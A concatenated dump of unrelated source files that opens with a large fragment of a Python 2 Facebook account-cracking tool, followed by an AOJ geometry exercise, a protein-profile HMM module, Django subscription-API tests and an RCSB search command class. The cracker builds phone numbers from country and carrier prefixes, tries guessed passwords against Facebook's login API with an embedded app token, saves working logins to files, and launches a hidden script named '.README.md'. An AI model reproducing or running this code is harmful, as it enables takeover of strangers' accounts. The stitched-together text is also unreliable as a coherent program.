data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(<PASSWORD>)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mValid_OK\x1b[1;58m]\x1b[1;58m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mInvalid_CP\x1b[1;58m]\x1b[1;58m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = b['first_name'] + '123456'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(<PASSWORD>)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mValid_OK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;58m|\x1b[1;97m ' + pass5
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mInvalid_CP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;58m|\x1b[1;97m ' + pass5
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['last_name'] + '786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(<PASSWORD>)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mValid_OK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;58m|\x1b[1;97m ' + pass6
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mInvalid_CP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;58m|\x1b[1;97m ' + pass6
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['last_name'] + '<PASSWORD>'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mValid_OK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;58m|\x1b[1;97m ' + pass7
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mInvalid_CP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;58m|\x1b[1;97m ' + pass7
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;96m⊱⋕⊰══════════════════════════════════════════⊱⋕⊰"
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mProcess Telah Selesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File Sudah Tersimpan \033[1;91m: \033[1;97mout/checkpoint.txt")
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
menu()
def menu():
os.system('clear')
print logo
print 42*"\033[1;91m="
print '\033[1;94m[1]\033[1;92m Bangladesh \033[1;91m⇋ \033[1;94m[20]\033[1;93m Albania'
print '\033[1;94m[2]\033[1;92m USA \033[1;91m⇋ \033[1;94m[21]\033[1;93m Algeria'
print '\033[1;94m[3]\033[1;92m UK \033[1;91m⇋ \033[1;94m[22]\033[1;93m Andorra'
print '\033[1;94m[4] \033[1;92m India \033[1;91m⇋ \033[1;94m[23]\033[1;93m Armenia'
print '\033[1;94m[5]\033[1;92m Brazil \033[1;91m⇋ \033[1;94m[24]\033[1;93m Georgia'
print '\033[1;94m[6]\033[1;92m Japan \033[1;91m⇋ \033[1;94m[25]\033[1;93m Iceland'
print '\033[1;94m[7]\033[1;92m Korea \033[1;91m⇋ \033[1;94m[26]\033[1;93m China'
print '\033[1;94m[8]\033[1;92m Italy \033[1;91m⇋ \033[1;94m[27]\033[1;93m Bhutan'
print '\033[1;94m[9]\033[1;92m Spain \033[1;91m⇋ \033[1;94m[28]\033[1;93m Mongolia'
print '\033[1;94m[10]\033[1;92m Poland \033[1;91m⇋ \033[1;94m[29]\033[1;93m New Zealand'
print '\033[1;94m[11]\033[1;92m Pakistan \033[1;91m⇋ \033[1;94m[30]\033[1;93m Sudan'
print '\033[1;94m[12]\033[1;92m Indonisia \033[1;91m⇋ \033[1;94m[+]\033[1;93m Pak Nbr Fb Clone\033[1;94m[+] '
print '\033[1;94m[13]\033[1;92m Iran \033[1;91m⇋ \033[1;94m[A]\033[1;93m Telenor'
print '\033[1;94m[14]\033[1;92m Grecee \033[1;91m⇋ \033[1;94m[B]\033[1;93m Zong'
print '\033[1;94m[15]\033[1;92m Afghanistan \033[1;91m⇋ \033[1;94m[C]\033[1;93m Jazz'
print '\033[1;94m[16]\033[1;92m Syria \033[1;91m⇋ \033[1;94m[+]\033[1;93m Bangal Nbr Fb Clone\033[1;94m[+] '
print '\033[1;94m[17]\033[1;92m Turky \033[1;91m⇋ \033[1;94m[D]\033[1;93m Airtel/Robi'
print '\033[1;94m[18]\033[1;92m Iraq \033[1;91m⇋ \033[1;94m[E]\033[1;93m Grameenphone'
print '\033[1;94m[19]\033[1;92m France \033[1;91m⇋ \033[1;94m[F]\033[1;93m Banglalink'
print '[0]\033[1;97m Keluar '
print '>>\033[1;92m Selamat Datang Di Script \033[1;91m(\033[1;97mAnonymous Pace Usa\033[1;91m) '
print 42*"\033[1;91m="
action()
def action():
bch = raw_input('\n\033[1;91mPilih Nomer \033[1;93m>>>\033[1;95m ')
if bch =='':
print '[!] Isi dengan benar'
action()
elif bch =="1":
os.system("clear")
print (logo)
print("\033[1;93m175,165,191, 192, 193, 194, 195, 196, 197, 198, 199")
try:
c = raw_input("\033[1;96m Masukan Kode : ")
k="+880"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="2":
os.system("clear")
print (logo)
print("786, 815, 315, 256, 401, 718, 917, 202, 701, 303, 703, 803, 999, 708")
try:
c = raw_input(" Masukan Kode : ")
k="+1"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="3":
os.system("clear")
print (logo)
print("737, 706, 748, 783, 739, 759, 790")
try:
c = raw_input(" Masukan Kode : ")
k="+44"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="4":
os.system("clear")
print (logo)
print("954, 897, 967, 937, 700, 727, 965, 786, 874, 856, 566, 590, 527, 568, 578")
try:
c = raw_input(" Masukan Kode : ")
k="+91"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="5":
os.system("clear")
print (logo)
print("127, 179, 117, 853, 318, 219, 834, 186, 479, 113")
try:
c = raw_input(" Masukan Kode : ")
k="+55"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="6":
os.system("clear")
print (logo)
print("11, 12, 19, 16, 15, 13, 14, 18, 17")
try:
c = raw_input(" Masukan Kode : ")
k="+81"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="7":
os.system("clear")
print (logo)
print("1, 2, 3, 4, 5, 6, 7, 8, 9")
try:
c = raw_input(" Masukan Kode : ")
k="+82"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="8":
os.system("clear")
print (logo)
print("388, 390, 391, 371, 380, 368, 386, 384, 332, 344, 351, 328")
try:
c = raw_input(" Masukan Kode : ")
k="+39"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="9":
os.system("clear")
print (logo)
print("60, 76, 73, 64, 69, 77, 65, 61, 75, 68")
try:
c = raw_input(" Masukan Kode : ")
k="+34"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="10":
os.system("clear")
print (logo)
print("66, 69, 78, 79, 60, 72, 67, 53, 51")
try:
c = raw_input(" Masukan Kode : ")
k="+48"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="11":
os.system("clear")
print (logo)
print("\033[1;93m01, ~to~~, 49")
try:
c = raw_input(" Masukan Kode : ")
k="+1"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="12":
os.system("clear")
print (logo)
print("\033[1;93m82,57,89,56,81")
try:
c = raw_input(" Masukan Kode : ")
k="+1"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="13":
os.system("clear")
print (logo)
print("\033[1;93m901, 902, 903, 930, 933, 935, 936, 937, 938, 939")
try:
c = raw_input(" Masukan Kode : ")
k="+98"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="14":
os.system("clear")
print (logo)
print("\033[1;93m69,693,698,694,695")
try:
c = raw_input(" Masukan Kode : ")
k="+3069"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="15":
os.system("clear")
print (logo)
print("\033[1;96m070, 071, 079, 072, 073, 078, 077, 076, 074, 075")
try:
c = raw_input(" Masukan Kode : ")
k="+93"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="16":
os.system("clear")
print (logo)
print("\033[1;93m11, 21, 57, 41, 15, 52, 31, 23")
try:
c = raw_input(" Masukan Kode : ")
k="+963"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="17":
os.system("clear")
print (logo)
print("\033[1;96m322, 264, 416, 272, 472, 382, 312")
try:
c = raw_input(" Masukan Kode : ")
k="+90"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="18":
os.system("clear")
print (logo)
print("\033[1;96m079, 078, 073, 074")
try:
c = raw_input(" Masukan Kode : ")
k="+964"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="19":
os.system("clear")
print (logo)
print("\033[1;96m3, 2, 1, 4")
try:
c = raw_input(" Masukan Kode : ")
k="+33"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="20":
os.system("clear")
print (logo)
print("\033[1;93m67, 68, 69")
try:
c = raw_input(" Masukan Kode : ")
k="+355"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="21":
os.system("clear")
print (logo)
print("\033[1;96m49, 27, 43, 21,33, 49,26, 34,27,38, 29")
try:
c = raw_input(" Masukan Kode : ")
k="+213"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="22":
os.system("clear")
print (logo)
print("\033[1;95m8, 7, 3")
try:
c = raw_input(" Masukan Kode : ")
k="+376"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="23":
os.system("clear")
print (logo)
print("\033[1;95m22, 43, 23,53, 46,52, 38")
try:
c = raw_input(" Masukan Kode : ")
k="+374"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="24":
os.system("clear")
print (logo)
print("\033[1;95m366, 342, 362,365, 349")
try:
c = raw_input(" Masukan Kode : ")
k="+995"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="25":
os.system("clear")
print (logo)
print("\033[1;95m4, 5")
try:
c = raw_input(" Masukan Kode : ")
k="+354"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="26":
os.system("clear")
print (logo)
print("\033[1;95m139, 138, 137, 138")
try:
c = raw_input(" Masukan Kode : ")
k="+86"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="27":
os.system("clear")
print (logo)
print("\033[1;95m2, 7, 5")
try:
c = raw_input(" Masukan Kode : ")
k="+975"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="28":
os.system("clear")
print (logo)
print("\033[1;95m11")
try:
c = raw_input(" Masukan Kode : ")
k="+976"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="29":
os.system("clear")
print (logo)
print("\033[1;95m9, 24")
try:
c = raw_input(" Masukan Kode : ")
k="+64"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="30":
os.system("clear")
print (logo)
print("\033[1;95m 21, 41, 183, 81")
try:
c = raw_input(" Masukan Kode : ")
k="+249"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="A":
os.system("clear")
print (logo)
print("\033[1;95m 40, 41, 42, 43, 44, 45, 46, 47, 48")
try:
c = raw_input(" Masukan Kode : ")
k="+92"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="B":
os.system("clear")
print (logo)
print("\033[1;91m 10, 11, 12, 13, 14, 15, 16, 17, 18")
try:
c = raw_input(" Masukan Kode : ")
k="+92"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="C":
os.system("clear")
print (logo)
print("\033[1;91m 00, 01, 02, 03, 04, 05, 06")
try:
c = raw_input(" Masukan Kode : ")
k="+92"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="D":
os.system("clear")
print (logo)
print("\033[1;91m 16, 17, 18")
try:
c = raw_input(" Masukan Kode : ")
k="+80"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="E":
os.system("clear")
print (logo)
print("\033[1;91m 13, 14, 15,16, 18")
try:
c = raw_input(" Masukan Kode : ")
k="+80"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="F":
os.system("clear")
print (logo)
print("\033[1;91m 14, 19")
try:
c = raw_input(" Masukan Kode : ")
k="+80"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="0":
os.system('rm -rf login.txt')
keluar()
xxx = str(len(id))
print ('[✓] Total Nomor: '+xxx)
time.sleep(0.1)
print ('\033[1;91m[✓]\033[1;94m Mohon Tunggu Proses Sedang Berjalan ...')
time.sleep(0.1)
print ('[!] Untuk Menghentikan Proses Tekan CTRL Lalu Tekan z')
time.sleep(0.5)
print 42*"\033[1;91m="
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = <PASSWORD>
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m[Successful]\033[1;95m ' + k + c + user + ' >>> ' + pass1+'\n'+"\n"
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'>>>'+pass1+'\n')
okb.close()
oks.append(c+user+pass1)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;93m[Checkpoint]\033[1;96m ' + k + c + user + ' >>> ' + pass1+'\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'>>>'+pass1+'\n')
cps.close()
cpb.append(c+user+pass1)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;91m="
print '[✓]\033[1;93m Process Telah Selesai ...'
print '[✓]\033[1;92m Total OK/\033[1;96mCP : '+str(len(oks))+'/'+str(len(cpb))
print('[✓]\033[1;91m CP File Telah Disimpan : save/checkpoint.txt')
raw_input('\n[Press Enter To Go Back]')
os.system('python2 .README.md')
if __name__ == '__main__':
login()
| StarcoderdataPython |
3276796 | <filename>src/AOJ/ITP1_10_B.py
import math
def resolve():
a, b, C = map(float, input().split())
x = math.radians(C)
h = b * math.sin(x)
S = "{0:.8f}".format((a * h) / 2)
c = math.sqrt(a ** 2 + b ** 2 - 2 * a * b * math.cos(x))
L = "{0:.8f}".format(a + b + c)
print(S, L, h, sep="\n")
| StarcoderdataPython |
13769 | from __future__ import annotations
from math import log
from typing import List, Type, Union
from imm import MuteState, Sequence, lprob_add, lprob_zero
from nmm import (
AminoAlphabet,
AminoLprob,
BaseLprob,
CodonLprob,
CodonMarg,
DNAAlphabet,
FrameState,
RNAAlphabet,
codon_iter,
)
from .codon_table import CodonTable
from .hmmer_model import HMMERModel
from .model import AltModel, EntryDistr, Node, NullModel, SpecialNode, Transitions
from .profile import Profile, ProfileID
__all__ = ["ProteinProfile", "create_profile"]
class ProteinProfile(Profile):
@classmethod
def create(
cls: Type[ProteinProfile],
profid: ProfileID,
factory: ProteinStateFactory,
null_aminot: AminoLprob,
core_nodes: List[Node],
core_trans: List[Transitions],
entry_distr: EntryDistr,
) -> ProteinProfile:
base_alphabet = factory.genetic_code.base_alphabet
R = factory.create(b"R", null_aminot)
null_model = NullModel.create(R)
special_node = SpecialNode(
S=MuteState.create(b"S", base_alphabet),
N=factory.create(b"N", null_aminot),
B=MuteState.create(b"B", base_alphabet),
E=MuteState.create(b"E", base_alphabet),
J=factory.create(b"J", null_aminot),
C=factory.create(b"C", null_aminot),
T=MuteState.create(b"T", base_alphabet),
)
alt_model = AltModel.create(
special_node,
core_nodes,
core_trans,
entry_distr,
)
# alt_model.set_fragment_length(self._special_transitions)
return cls(profid, base_alphabet, null_model, alt_model, False)
# @property
# def epsilon(self) -> float:
# nodes = self._alt_model.core_nodes()
# return nodes[0].M.epsilon
# @classmethod
# def create_from_binary(
# cls: Type[ProteinProfile],
# profid: ProfileID,
# null_model: nmm.Model,
# alt_model: nmm.Model,
# ):
# special_node = wrap.special_node(alt_model.hmm)
# core_nodes = wrap.core_nodes(alt_model.hmm)
# alt = AltModel.create_from_hmm(
# special_node, core_nodes, alt_model.hmm, alt_model.dp
# )
# null = NullModel.create_from_hmm(null_model.hmm)
# return cls(profid, alt_model.hmm.alphabet, null, alt, False)
# @property
# def window_length(self) -> int:
# return super().window_length
# @window_length.setter
# def window_length(self, length: int) -> None:
# if length < -1:
# raise ValueError("Length must be greater than or equal to -1.")
# if length == -1:
# length = 2 * 3 * self._alt_model.core_length
# self._window_length = length
def create_sequence(self, sequence: bytes) -> Sequence:
return Sequence.create(sequence, self.alphabet)
@property
def null_model(self) -> NullModel:
return self._null_model
@property
def alt_model(self) -> AltModel:
return self._alt_model
# def search(self, sequence: SequenceABC) -> SearchResults:
# self._set_target_length_model(len(sequence))
# alt_results = self._alt_model.viterbi(sequence, self.window_length)
# def create_fragment(
# seq: SequenceABC, path: Path, homologous: bool
# ):
# return ProteinFragment(seq, path, homologous)
# search_results = SearchResults(sequence, create_fragment)
# for alt_result in alt_results:
# subseq = alt_result.sequence
# # TODO: temporary fix for reading from binary file
# # and consequently alt and null model having different alphabets
# s = Sequence.create(bytes(subseq), self._null_model.hmm.alphabet)
# viterbi_score0 = self._null_model.loglikelihood(s)
# if len(alt_result.path) == 0:
# viterbi_score1 = lprob_invalid()
# else:
# viterbi_score1 = self._alt_model.loglikelihood(alt_result.sequence,
# alt_result.path)
# score = viterbi_score1 - viterbi_score0
# window = Interval(subseq.start, subseq.start + len(subseq))
# search_results.append(
# score, window, alt_result.path, viterbi_score1, viterbi_score0
# )
# return search_results
# def create_profile(
# hmm: HMMERModel,
# base_abc: Union[RNAAlphabet, DNAAlphabet],
# window_length: int = 0,
# epsilon: float = 0.1,
# ) -> ProteinProfile:
# amino_abc = hmm.alphabet
# assert isinstance(amino_abc, AminoAlphabet)
# lprobs = lprob_normalize(hmm.insert_lprobs(0))
# null_aminot = AminoLprob.create(amino_abc, lprobs)
# factory = ProteinStateFactory(CodonTable(base_abc, amino_abc), epsilon)
# nodes: List[Node] = []
# for m in range(1, hmm.model_length + 1):
# lprobs = lprob_normalize(hmm.match_lprobs(m))
# M = factory.create(f"M{m}".encode(), AminoLprob.create(amino_abc, lprobs))
# lprobs = lprob_normalize(hmm.insert_lprobs(m))
# I = factory.create(f"I{m}".encode(), AminoLprob.create(amino_abc, lprobs))
# D = MuteState.create(f"D{m}".encode(), base_abc)
# nodes.append(Node(M, I, D))
# trans: List[Transitions] = []
# for t in hmm.transitions:
# t.normalize()
# trans.append(t)
# profid = ProfileID(hmm.model_id.name, hmm.model_id.acc)
# prof = ProteinProfile.create(
# profid, factory, null_aminot, nodes, trans, EntryDistr.UNIFORM
# )
# prof.window_length = window_length
# return prof
def create_profile(
hmm: HMMERModel,
base_abc: Union[RNAAlphabet, DNAAlphabet],
window_length: int = 0,
epsilon: float = 0.1,
) -> ProteinProfile:
amino_abc = hmm.alphabet
assert isinstance(amino_abc, AminoAlphabet)
null_lprobs = hmm.null_lprobs
null_log_odds = [0.0] * len(null_lprobs)
null_aminot = AminoLprob.create(amino_abc, null_lprobs)
factory = ProteinStateFactory(CodonTable(base_abc, amino_abc), epsilon)
nodes: List[Node] = []
for m in range(1, hmm.model_length + 1):
lodds = [v0 - v1 for v0, v1 in zip(hmm.match_lprobs(m), null_lprobs)]
M = factory.create(f"M{m}".encode(), AminoLprob.create(amino_abc, lodds))
I = factory.create(
f"I{m}".encode(), AminoLprob.create(amino_abc, null_log_odds)
)
D = MuteState.create(f"D{m}".encode(), base_abc)
nodes.append(Node(M, I, D))
trans = hmm.transitions
profid = ProfileID(hmm.model_id.name, hmm.model_id.acc)
entry_distr = EntryDistr.OCCUPANCY
prof = ProteinProfile.create(
profid, factory, null_aminot, nodes, trans, entry_distr
)
prof.window_length = window_length
return prof
class ProteinStateFactory:
def __init__(
self,
gcode: CodonTable,
epsilon: float,
):
self._gcode = gcode
self._epsilon = epsilon
def create(self, name: bytes, aminot: AminoLprob) -> FrameState:
codonp = _create_codon_prob(aminot, self._gcode)
baset = _create_base_table(codonp)
codonm = CodonMarg.create(codonp)
return FrameState.create(name, baset, codonm, self._epsilon)
@property
def genetic_code(self) -> CodonTable:
return self._gcode
@property
def epsilon(self) -> float:
return self._epsilon
def _create_base_table(codonp: CodonLprob):
base_abc = codonp.alphabet
base_lprob = {base: lprob_zero() for base in base_abc.symbols}
norm = log(3)
for codon in codon_iter(base_abc):
lprob = codonp.get_lprob(codon)
triplet = codon.symbols
base_lprob[triplet[0]] = lprob_add(base_lprob[triplet[0]], lprob - norm)
base_lprob[triplet[1]] = lprob_add(base_lprob[triplet[1]], lprob - norm)
base_lprob[triplet[2]] = lprob_add(base_lprob[triplet[2]], lprob - norm)
assert len(base_lprob) == 4
bases = base_abc.symbols
assert len(bases) == 4
return BaseLprob.create(
base_abc,
(
base_lprob[bases[0]],
base_lprob[bases[1]],
base_lprob[bases[2]],
base_lprob[bases[3]],
),
)
def _create_codon_prob(aminot: AminoLprob, gencode: CodonTable) -> CodonLprob:
codonp = CodonLprob.create(gencode.base_alphabet)
codon_lprobs = []
lprob_norm = lprob_zero()
for i in range(len(aminot.alphabet.symbols)):
aa = aminot.alphabet.symbols[i : i + 1]
lprob = aminot.lprob(aa)
codons = gencode.codons(aa)
if len(codons) == 0:
continue
norm = log(len(codons))
for codon in codons:
codon_lprobs.append((codon, lprob - norm))
lprob_norm = lprob_add(lprob_norm, codon_lprobs[-1][1])
for codon, lprob in codon_lprobs:
codonp.set_lprob(codon, lprob - lprob_norm)
return codonp
| StarcoderdataPython |
156429 | import pytest
from recipes.tests.share import create_recipes
from users.tests.share import create_user_api
pytestmark = [pytest.mark.django_db]
URL = '/api/users/subscriptions/'
RESPONSE_KEYS = (
'id',
'email',
'username',
'first_name',
'last_name',
'is_subscribed',
'recipes',
'recipes_count',
)
RECIPE_FIELDS = ('id', 'name', 'image', 'cooking_time')
PAGINATION_PARAMS = ('count', 'next', 'previous', 'results')
def test_ok(as_anon, as_user, as_admin, admin, ingredients, tags):
another_user = create_user_api(as_anon)
create_recipes(as_admin, ingredients, tags)
as_user.get(
f'/api/users/{another_user.id}/subscribe/',
expected_status=201,
)
as_user.get(f'/api/users/{admin.id}/subscribe/', expected_status=201)
got = as_user.get(URL)
assert tuple(got.keys()) == PAGINATION_PARAMS
assert tuple(got['results'][0].keys()) == RESPONSE_KEYS
assert got['count'] == 2
results = got['results']
assert admin.email == results[0]['email']
assert another_user.email == results[1]['email']
assert results[0]['is_subscribed']
assert results[1]['is_subscribed']
assert len(results[0]['recipes']) == 2
assert len(results[1]['recipes']) == 0
assert tuple(results[0]['recipes'][0].keys()) == RECIPE_FIELDS
def test_recipes_limit_recipes_count(
as_user,
as_admin,
admin,
ingredients,
tags,
):
create_recipes(as_admin, ingredients, tags)
as_user.get(f'/api/users/{admin.id}/subscribe/', expected_status=201)
got = as_user.get(URL, {'recipes_limit': 1})
assert len(got['results'][0]['recipes']) == 1
assert got['results'][0]['recipes_count'] == 2
def test_anon(as_anon):
as_anon.get(URL, expected_status=401)
| StarcoderdataPython |
186599 | from .queries import TerminalQuery, QueryParams
from .search import Searcher
from .services import SeqmotifService, SequenceService, StructureService, StructMotifService, TextService
class Command:
def __init__(self, url="https://search.rcsb.org/rcsbsearch/v1/query?", resp_type="entry",
start=0, rows=100):
self._set_source(url, resp_type)
self._set_resp_limits(start, rows)
def _set_source(self, url, resp_type):
self.url = url
if resp_type not in QueryParams.RETURN_TYPES.value:
raise NameError('Unknown return type, available {}'.format(QueryParams.RETURN_TYPES.value))
self.resp_type = resp_type
def _set_resp_limits(self, start, rows):
self.start = start
self.rows = rows
@classmethod
def set_source(cls, url, resp_type):
cls.url = url
if resp_type not in QueryParams.RETURN_TYPES.value:
raise NameError('Unknown return type, available {}'.format(QueryParams.RETURN_TYPES.value))
cls.resp_type = resp_type
@classmethod
def set_parser(cls, parser):
cls.parser = parser
def execute(self):
pass
class SearchMotifCommand(Command):
def __init__(self, query, type_='prosite', *args, **kwargs):
super().__init__(*args, **kwargs)
self.success = 1
